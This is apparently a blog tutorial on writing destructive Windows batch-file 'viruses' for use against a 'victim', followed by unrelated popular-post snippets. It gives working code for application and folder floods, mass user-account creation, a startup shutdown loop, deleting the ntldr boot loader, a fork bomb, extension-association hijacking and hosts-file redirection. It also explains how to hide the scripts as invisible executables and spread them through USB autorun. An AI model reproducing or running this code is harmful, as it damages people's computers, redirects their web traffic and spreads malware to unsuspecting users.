Skip to main content

Batch Files - the art of creating viruses

 

I could just you give the  codes to paste  in notepad and  ask you to save files with extension .bat and   your deadly batch viruses would be ready. But instead of that, I have focussed on making the basics of batch files clear and developing the approach to code your own viruses.

What are Batch Files ?


Lets begin with a simple example , Open your command prompt and change your current directory to 'desktop


by typing 'cd desktop' without quotes.


Now type these commands one by one



1. md x  //makes directory 'x' on desktop

2. cd x  // changes current directory to 'x'

3. md y // makes a directory 'y' in directory 'x'    






We first make a folder/directory 'x', then enter in folder  'x',then make a folder 'y' in folder 'x' . 

Now delete the folder 'x'.

Lets do the same thing in an other way. Copy these three commands in  notepad and save file as anything.bat  




Now just double click on this batch file and the same work would be done , You will get a folder 'x' on your desktop and folder 'y' in it. This means the three commands executed line by line when we ran the batch file 



So a batch file is simply a text containing series of commands which are executed automatically line by line when the batch file is run. 



What can batch viruses do ?




They can be used to delete the windows files,format data,steal information,irritate victim, consume CPU resources to affect performance,disable firewalls,open ports,modify or destroy registry and for many more purposes.



Now lets start with simple codes, Just copy the code to notepad and save it as anything.bat (I am anything you wish but extension must be bat and save it as 'all files' instead of text files).



Note: Type 'help' in command prompt to know about some basic commands and to know about using a particular command , type 'command_name /?' without quotes.

1.  Application Bomber


@echo off // It instructs to hide the commands when batch files is executed

:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop



This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and of-course affecting performance. 

2. Folder flooder


@echo off
:x
md %random% // makes directory/folder. 
goto x

Here %random% is a variable that would generate a positive no. randomly.  So this code would make start creating folders whose name can be any random number. 

3.User account flooder 

@echo off
:x
net user %random% /add //create user account
goto x

This code would start creating windows user accounts whose names could be any random numbers. 

4.Shutdown Virus

copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup” 
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” //these two commands will copy the batchfile in start up folders (in XP) shutdown -s -t 00 //this will shutdown the computer in 0 seconds


Note : Files in Start up folder gets started automatically when windows starts .  You should  first two lines of  code in every virus code so that it would copy itself in startup folder. Start up folder path in Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup



Everytime the victim would start the computer, the batch file in start up would run and shutdown the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder. 



5. Deleting boot files



Goto C drive in Win XP , Tools->Folder Option->View

Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply 



Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows. 

Lets make a batch file to 
delete this file from victim's computer and the windows will not start then.

attrib -S -R -H C:\ntldr   // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del ntldr    //delete ntldr file

After running this batch file , system will not reboot and a normal victim would definitely install the windows again.

6. Fork Bomb


%0|%0  //Its percentage zero pipe percentage zero

This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows .


7. Extension Changer


@echo off
assoc .txt=anything // this command associates extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything                          


Every extension is associated with a filetype like extension ‘exe’ is  is associated with filetype ‘exefile’. To see them, just enter command ‘assoc’ in command prompt.
 Above code changes the association of some extensions to filetype ‘anything’ (means u can write anything) which obviously doesn’t exist. So all exe (paint,games,command prompt and many more),jpeg,png,mpeg files wudn’t open properly.

8.  DNS Poisoning


There is a file called ‘hosts’ located at c:\windows\system32\drivers\etc. We can place a website and an IP in front of it. By doing this, we want our web browser to take us to host located at that IP when that website name would be entered. I mean request to resolve IP of website is not sent to Domain Name Server(DNS) if the name of website in hosts  file.

@echo off
echo xxx.xxx.xxx.xxx www.anything.com > C:\windows\system32\drivers\etc\hosts   //this command prints or add xxx.xxx.xxx.xxx. www.anything.com in hosts file. 

Replace xxx.xxx.xxx.xxx  and www.anything.com with IP address and website of your choice. You can take/redirect victim to any host located at specific IP when he wood try to log on to specific website or u can simply block any website by entering its name and any invalid IP address.

    Viruses we just coded


Note : Most of the batch viruses are simply undetectable by any anitiviruses
Tip : Coding good viruses just depends on the DOS commands you know and logic you use.
   

Limitations of Batch Viruses -:


1.Victim can easily read the commands by opening batch file in notepad.
2.The command prompt screen pops up,it alerts the victim and he can stop it.

To overcome these limitations,we need to convert these batch files into executable files that is exe files.
Download this Batch To Exe coverter from here. 

After running converter ,  open the batch file virus , Save as exe file , set visibility mode 'Invisible application' , than just click on compile button. 
You can  use other options as per your requirement. 

Spreading batch viruses through pen drive -:

Step 1. 

Open notepad and write 
[autorun]
open=anything.bat
Icon=anything.ico

Save file as ‘autorun.inf’

Step 2
. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .
When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.

 

Comments

Popular posts from this blog

How to find and remove duplicate files from PC uplicate files can cause all kinds of problems on your computer, taking up precious storage room, confusing your photo or media manager apps, and generally getting in the way of searches and other operations when you'd rather they didn't. You don't have to accept duplicate files as an inevitability of running a PC, though: Here's how to get rid of them. Duplicate files can crop up for all kinds of reasons: Maybe you downloaded a file, forgot it was there, and then downloaded it again; maybe you copied a folder of images and then never got around to getting rid of the originals. Whatever the reason, they clog up your disk space and shouldn't be left to gather dust. For the purposes of this guide we're going to use DupeGuru-it's Lifehacker's pick as the best duplicate file finder for Windows, and it's available for Mac and Linux as well. If you're not taken with DupeGuru, then some of the best al...

Gmail Automation

Gmail Automation: 5 Useful Google Scripts to Automate Your Gmail 1. Auto delete emails after X number of days Very often, after we read the email, we will just keep it in our inbox, regardless whether it is useful or not. While Google gives you tons of space to store your emails, you might still want to clean up your inbox and get rid of those useless emails. The following script can check emails with the “Delete Me” label and delete them after “x” number of days. 1. Go to  Google Scripts  and create a blank project (make sure you are logged into your Google account). Paste the following script and save it. function auto_delete_mails ( ) { var label = GmailApp.getUserLabelByName ( "Delete Me" ) ; if ( label == null ) { GmailApp.createLabel ( 'Delete Me' ) ; } else { var delayDays = 2 // Enter # of days before messages are moved to trash var maxDate = new Date ( ) ; maxDate.setDate ( maxDate.getDate ( ) -delay...

iPhone 7 and iPhone 7 Plus review: The best iPhones Apple has made

iPhone 7 and iPhone 7 Plus review: The best iPhones Apple has made 's tough meeting expectations years after year. And yet, Apple keeps doing it, although no longer as effortlessly as it would do earlier in this decade. The company launched the iPhone 7 and the iPhone 7 Plus on October 7 in the Indian market, a month after the global announcement of the two phones. These are the phones that look like incremental update to the iPhone 6S and the iPhone 6S Plus. But looks can be deceiving. And they surely are in this case. Of late, the iPhone is facing tough challenge from others in the market. The Galaxy S7 arguably has a better design. The Samsung phone also has better screen and, in most cases, better camera. Google's Nexus phones have better software. The HTC offers better sound in its high-end phones. The Sony phones are waterproof. All of this puts the iPhone at a back-foot. The good thing is that Apple knows these challenges and is meeting them head-on with t...